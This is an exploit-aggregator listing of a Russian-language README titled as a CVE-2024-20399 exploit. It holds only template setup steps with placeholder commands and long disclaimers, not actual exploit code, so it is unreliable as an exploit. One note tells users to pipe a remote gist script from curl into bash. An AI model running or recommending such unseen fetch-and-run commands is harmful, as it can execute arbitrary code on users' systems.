Sploitus

Exploit for CVE-2024-20399

kitploit · 2026-08-27

Exploit Code

MARKDOWN141 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2024-20399
# CVE-2024-20399

## ⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  * Локальные виртуальные машины
  * Контейнеры Docker
  * Изолированные лабораторные настройки
  * Авторизованные среды тестирования на проникновение



Пример настройки:

root@kitploit:~
    
    
    git clone <repository-url>
    cd <repository-name>
    
    # Project use python follow below
    
    # Create a virtual environment
    python -m venv venv
    
    # Activate the virtual environment
    
    # macOS / Linux
    source venv/bin/activate
    
    # Windows (Git Bash / WSL)
    source venv/Scripts/activate
    
    # Install requirments
    pip install -r requirements.txt
    
    

Пример использования:

root@kitploit:~
    
    
    # Install dependencies
    <install-command>
    
    # Run the project
    <run-command>
    
    # Replace the commands above with your actual project setup steps.
    

Примечание:

  * при клонировании из другого проекта вы должны выполнить `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y`, чтобы очистить вложенный каталог .git
  * например: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...



* * *

## Благодарности и ссылки

  * https://gbhackers.com/velvet-ant-hackers-backdoor-openssh
  * https://github.com/advisories/GHSA-428g-3m2x-46jh



* * *

# 📚 Образовательный репозиторий для исследований в области безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.

* * *

## ⚠️ Отказ от ответственности в области безопасности и юридический

## Назначение

Этот репозиторий предназначен только для **образовательных и авторизованных исследований в области безопасности**.

Он предназначен для помощи пользователям в изучении:

  * Уязвимости безопасности
  * Концепции песочницы и изоляции
  * Безопасное кодирование и защитные практики



* * *

## Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, таких как:

  * Личные лаборатории или виртуальные машины
  * Docker или изолированные среды
  * Авторизованное тестирование на проникновение
  * Обучение кибербезопасности или академические исследования



Несанкционированное или незаконное использование строго запрещено.

* * *

## Отсутствие ответственности

Автор и участники **не несут ответственности** за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  * Вы несете ответственность за свои действия
  * Вы будете использовать его законно и этично
  * Проект предоставляется **без гарантий**



* * *

## Этичное использование

Этот проект предназначен для:

  * Исследования в области защитной безопасности
  * Образование в области кибербезопасности
  * Осведомленность об уязвимостях
  * Исследования безопасных систем и программного обеспечения



Пожалуйста, следуйте практике ответственного раскрытия информации и соблюдайте все применимые законы.

* * *

## Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с мейнтейнером репозитория через GitHub.